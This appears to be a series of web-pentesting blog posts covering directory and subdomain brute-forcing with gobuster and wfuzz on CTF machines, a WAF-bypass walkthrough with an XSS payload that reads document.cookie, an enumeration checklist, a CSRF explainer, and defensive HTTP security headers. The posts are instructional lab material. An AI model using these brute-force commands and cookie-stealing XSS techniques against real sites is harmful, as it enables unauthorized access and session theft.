Likely, the webserver you’re attacking is configured to always respond with a 200 response code. For example, let’s look at BART on Hack The Box.
Let’s see if we can extract anything with Curl. We’ll start by sending a request out to the default page. We see that it returns a 302 redirect to forum.bart.htb.
curl -vvv 10.10.10.81
Let’s try a request to a page we know doesn’t exist, and we are returned a success 200 message that displays an image. This explains why Gobuster was returning a 200 message on each directory.
We can confirm this by browsing to the page and looking at the image.
Armed with this information, we know that 200 response codes are bad, but other response codes (such as a 302) indicate a directory is present. Let’s rerun our Gobuster command, but we’ll specify which response codes we want returned.
Checking the help page, we can see that Gobuster accepts the following response codes; “200,204,301,302,307,401,403”.
So our command will look like this.
gobuster dir -u http://10.10.10.81 -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -s "204,301,302,307,401,403"
And with that command running, we eventually start to get some real results back.
This guide is going to use CMess from TryHack.me as an example, but does not intend to serve as a walkthrough or write-up of the machine.
Before we begin, make sure you can resolve the domain name that we’re targeting. If you’re doing this in a CTF-type environment, you may need to update your /etc/hosts file with the hostname/address of the target.
We can use a tool called wfuzz to bruteforce a list of subdomains, but first, we’ll need a list to use.
Now you may get a ton of output that shows valid subdomains depending on how the site is configured. If you notice a large amount of results that contain the same word count, this may just be an indication that the site returns a 200 response, but it just displays a “Not found” error.
To remove results with a specific word count, you can append your command w/ --hw <value>. For example, our new command that removes results that respond w/ a word count of 290 would look like the following:
This will return a list of subdomains that do not contain a word count of 290. If you get a successful result, make sure you’re able to resolve the subdomain as well before trying to browse to it. If you’re in a CTF-type environment, you may need to update your /etc/hosts file.
With our /etc/hosts file updated, we should be able to browse to the page.
This post intends to serve as a guide for a common bypass technique when you’re up against a web application firewall (WAF). In the event that the WAF limits what tags and attributes are allowed to be passed, we can use BurpSuite’s Intruder functionality to learn which tags are allowed.
Table of Contents:
Setting the stage.
Identifying which tags are allowed.
Identifying which events are allowed.
Putting the pieces together.
Setting the stage.
In our example, we have a webapp with a vulnerable search field. To begin testing, we start out with a simple XSS payload that will display the session cookie of the user when it fails to load a bad image path.
<img src=1 onerror=alert(document.cookie)>
However, the webserver responds with an error stating we’re using a tag that isn’t allowed.
Identifying which tags are allowed.
Let’s spin up BurpSuite and capture a web request with a generic search term.
With our request captured, let’s send this off to Intruder.
To begin, lets Clear the default payload positions BurpSuite selected for us.
Now we will replace the search term with <> to open/close the script tags that we wish to send to the application. Place the cursor between the angle brackets and click Add § twice, to create a payload position. The value of the search term should now look like: <§§>
Now that we have the position set, we need to provide our list of payloads. Head over to PortSwigger’s XSS cheat sheet and click Copy tags to clipboard.
With a list of all tags copied to your clipboard, head back to Intruder and select the Payload tab. Then click Paste.
Everything should now be in place! Let’s click Start Attack and allow time for all of the requests to be made.
Once the attack finishes, we see that the Body tag returns a status code of 200. This indicates that the WAF allows this tag and perhaps we can use it for our exploitation process.
Identifying which events are allowed.
Now that we know we can use the body tag, we need to know which events we can use. We’ll repeat the same process we used above, but this time, we’ll Copy events to clipboard from the PortSwigger’s XSS cheat sheet.
Heading back to Intruder, we’ll start by adjusting our list of Payloads. Click Clear to remove the existing list.
Now we can Paste our list of events.
Let’s head over to the Positions tab and adjust our search term to <body%20=1>. Place your cursor before the equal sign and then click Add § twice to create the payload position. The value of the search term should now look like: <body%20§§=1>
This will cause BurpSuite to send requests to the search field that look like
Observe the results, and notice that the only payload returning a 200 response is onresize.
Putting the pieces together.
As an attacker, lets spin up a malicious webpage that includes a reference to the vulnerable webapp within an iframe.
We begin by inserting an iframe to our webpage that will display content from the vulnerable webapp.
We then inject a search query that will generate an alert containing the victim’s session cookie when the element onresize is called within the body tag.
We then force the iframe to resize itself to a width of 100px upon loading.
When the victim browses to our malicious website, this iframe will be loaded in their browser, resized, and then the session cookie will be displayed back to them.
Now this is really just useful as a proof of concept, because this particular example doesn’t provide the attacker with the session cookie. The finished product would look something like this after including HTML encoding.
We can also leverage the following wordlist to look for CGI URLs.
gobuster dir -u http://<address>/ -w /usr/share/dirb/wordlists/vulns/cgis.txt -s '200,204,301,302,307,403,500' -e
Note: If you start getting spammed with a particular response code, you can remove that from the -s flag.
If you find a cgi-bin directory, you may want to consider scanning it for .sh files. If one is found, see if you the machine is vulnerable to shellshock. There is an nmap script that can identify the vulnerability, but it isn’t always reliable. May be beneficial to run it through a tool like Burp to look at the requests.
This is a tool you can get from Github. It provides much of the same functionality as Gobuster.
The following syntax will run the tool to enumerate php and html files. It will exclude responses w/ code 400, 401, and 403.
Enumerating valid parameters in URLs. You can run the following command to try and brute-force valid parameter names. wfuzz -u http://<address>/?FUZZ=index -w /usr/share/seclists/Discovery/Web-Content/common.txt
Once you feel you’ve enumerated everything, just check your work against this list to make sure you’re not missing anything.
Did you brute force directories?
Did your brute force search recursively?
Did your brute force include file extensions?
Is your brute force case-sensitive?
Did you enumerate the hostname of the box and updated your /etc/hosts file to include it?
Did you enumerate subdomains?
Did you brute force directories when browsing to it via hostname?
Did you review every webpage on the box for clues?
Did you review the source code?
Are there usernames hidden anywhere?
Are there specific version details provided?
Did you check for vulnerable technologies?
If you’re able to enumerate version information, did you searchsploit and/or research for public exploits?
What about for PHP or ASP?
What about for WordPress or Drupal?
What about for Apache or IIS?
Can you use a specific tool like WPSCAN to enumerate further?
Did you find a login page?
Can you enumerate multiple users on it?
Can you brute-force it?
Can you perform an injection attack (SQL, XSS, etc.)?
If there is HTTPS on the page, did you check the certificate for details?
Does the cert contain specific email addresses?
Does the cert contain information about a hostname of the box?
Is the cert valid on other domain-names?
Are there other ports running HTTP or HTTPS that you need to repeat all of this on?
It became apparent to me that my understanding of CSRF was lacking, or uh, basically non-existent. This post aims to fix that! Come learn about it along with me.
Note: This particular post is NOT a hacking tutorial on abusing CSRF, though I’m sure I will post one in the near future (make sure to subscribe or hit up my Twitter feed so you’ll know when that comes out).
What is Cross Site Request Forgery?
Well we know that it is consistently in the OWASP Top 10 for web application vulnerabilities, but what does it actually do?
CSRF is when another website is able to make a request, as a victim user, to the target website. What does that mean? Well, it means that an attacker may trick the users of a web application into performing unwanted tasks, such as transferring funds, changing their email address, deleting their account, posting a comment, etc.
Let’s say there is a web application running on vulnerable.com (please don’t try to actually visit this site, I have no idea what is there and whether or not its a valid webpage). In our fake scenario, vulnerable.com hosts a simple web application where you can create an account and post a comment on a text board. There is also a page for you to be able to delete your account. Normally, if an end-user wanted to actually delete their account, they would browse to this page, click the confirmation button, and then a request would be made to the webserver that looks something like this:
The key items to note about this is that there is a POST request to vulnerable.com/delete_my_account for a specific SessionID. Now in a perfect world, the only person who would initate this request would be the actual end-user behind that SessionID, but what if us — evil hackers — wanted to delete the account for them without their consent?
This is where CSRF comes in. Let’s, as attackers, spin up a malicious webpage at evil.com (same disclaimer as before) and add code so that we initiate that same request mentioned above once a user accesses our webpage. If vulnerable.com doesn’t have protections in place, we could leverage CSRF to send the same POST request and delete user accounts on a completely separate website without the users consent.
So how do we mitigate this?
There are a number of mitigation techniques.
Add a hash (session id, function name, service-side secret) to all forms. This method involves including a random, unique identifier to webforms when a user accesses the page. The idea behind this technique is that attack webservers will not possibly be able to know what unique identifier is being used for the victim user on the target website. This means that even if they attempt a CSRF attack, the target website will notice that the unique identifier is missing and reject the POST request.
Checking the Referrer header in the client’s HTTP request. When a web request is submitted, there is typically a referrer header added that specifies where that web request originated. Ensuring that the request has come from the original site means that attacks from other sites will not function.
Note: This method may not always be reliable for web-developers if the user utilizes ad-blocker or additional privacy protection methods, as the referrer header on a valid web request may indicate the request came from one of these third parties.
Signing off of webpages when not in use. While CSRF is really a problem with the web application, and not the end user utilizing the webpage, users can protect themselves by signing out or killing any active sessions for their sensitive webapps BEFORE browsing the web or accessing a different page.
This post intends to discuss the three most common HTTP headers that leak server information. While these headers don’t do anything to help protect against attacks, they can be used by attackers to enumerate the underlying technologies behind the application during the early enumeration phase of an attack.
What does this header do? This header contains information about the software used by the back-end server (type and version).
We’re able to identify that this webserver is running IIS 8.5 based on the Server header.
What does this header do? It contains the details of the web framework or programming language used in the web application.
We’re able to identify example what PHP version is being used on this webserver by it’s X-Powered-By header.
What does this header do? As the name suggests, it shows the version details of the ASP .NET framework. This information may help an adversary to fine-tune its attack based on the framework and its version.
We’re able to identify exactly what ASP .NET version is running on this webserver based on the X-AspNet-Version header.
Why do we care? What can do we do about it?
Why is this dangerous? Because these headers can leak software information, this allows an attacker to know what exact web technologies are in place and what their associated version(s) are. Armed with this information, they can then hunt for public known exploits on those versions.
What is your recommendation? The server information can be masked by re-configuring the webserver to read something other than the actual server technologies in place.
This post intends to serve as a guide for some of the most common HTTP Headers web applications use to prevent exploitation of potential vulnerabilities. Within this article, you will discover the name of the various headers, along with their use case and various configuration options.
What does this header do? HTTP Strict Transport Security instructs the browser to access the webserver over HTTPS only.
Why would we use this? By enforcing the use of HTTPS, we’re ensuring that users accessing the web page has a secure, encrypted connection. This can also help users notice whether or not they are victim to man in the middle attacks if they receive certificate errors when a valid certificate is in place on the webpage.
What values can we set this header to? There are 3 directives for this header:
Max-Age : Default value of 31536000. This is the maximum age (time) for which the header is valid. The server updates this time with every new response to prevent it from expiring.
IncludeSubDomains : This applies control over subdomains of the website as well.
Preload : This is a list that is maintained by Google. Websites on this list will automatically have HTTP enforced in the Google Chrome browser.
What does this header do? Content Security Policy is used to instruct the browser to load only the allowed content defined in the policy. This uses a whitelisting approach which tells the browser from where to load the images, scripts, CSS, applets, etc.
Why would we use this? If implemented properly, we would be able to prevent exploitation of Cross-Site Scripting (XSS), Clickjacking, and HTML Injection attacks. We do this by carefully specifying where content can be loaded from, which hopefully isn’t a location that attackers have control of.
What values can we set this header to? The values can be defined with the following directives:
default-src 'self' : Load everything from the current domain.
script-src runscript.com : Scripts can only be loaded from runscript.com
media-src online123.com online321.com : Media can only be loaded from online123.com and online321.com.
img-src * : Images can be loaded from anywhere.
What does this header do? This header indicates whether the response can be shared with requesting code from the given origin.
Why would we use this? This is used to take a whitelisting approach on which third parties are allowed to access a given resource. For example, if site ABC wants to access a resource on site XYZ (and is allowed to), XYZ will respond with a Access-Control-Allow-Origin header with the address of site ABC to instruct the browser that this is allowed.
What values can we set this header to? The following directives can be used:
* : For requests without credentials, you can specify a wildcard to tell browsers to allow requesting code from any origin to access the resource.
<origin> : Specifics a single origin.
null : This should not be used.
Why would we use the additional attributes? Using these additional attributes can help protect the cookies against unauthorized access.
What values can we apply? While there are many attributes for a cookie, the following are most important from a security perspective.
Secure : A cookie set with this attribute will only be sent over HTTPS and not over the clear-text HTTP protocol (which is susceptible to eavesdropping).
What does this header do? This header can be used to indicate whether or not a browser should be allowed to render a page in a <frame>, <iframe> or <object>.
Why would we use this? Use this to avoid clickjacking attacks. Without clickjacking protections, an adversary could trick a user to access a malicious website which will load the target application into an invisible iframe. When the user clicks on the malicious application (ex. a web-based game), the clicks will be ‘stolen’ and sent to the target application (Clickjacking). As a result, the user will click on the legitimate application without his consent, which could result in performing some unwanted actions (ex. delete an account, etc).
What values can we set this header to? There are 3 directives we can use:
deny : This will not allow the page to be loaded in a frame on any website.
same-origin : This will allow the page to be loaded in a frame only if the origin frame is same.
allow-from uri : The frame can only be displayed in a frame on the specified domain/origin.
What does this header do? This header enables the Cross-site scripting (XSS) filter built into most recent web browsers.
Why would we use this? The sole purpose is to protect against Cross-Site Scripting (XSS) attacks.
What values can we set this header to? There are 3-modes that we can set this header to:
0; : Disables the XSS filter.
1; : Enables the filter. If an attack is detected, the browser will sanitize the content of the page in order to block the script execution.
1; mode=block : Will prevent the rendering of the page if an XSS attack is detected.
This is nowhere near an exhaustive list of the different security headers that you should be using. Should you like to learn more or dive into this topic deeper, I’d recommend checking out the following websites: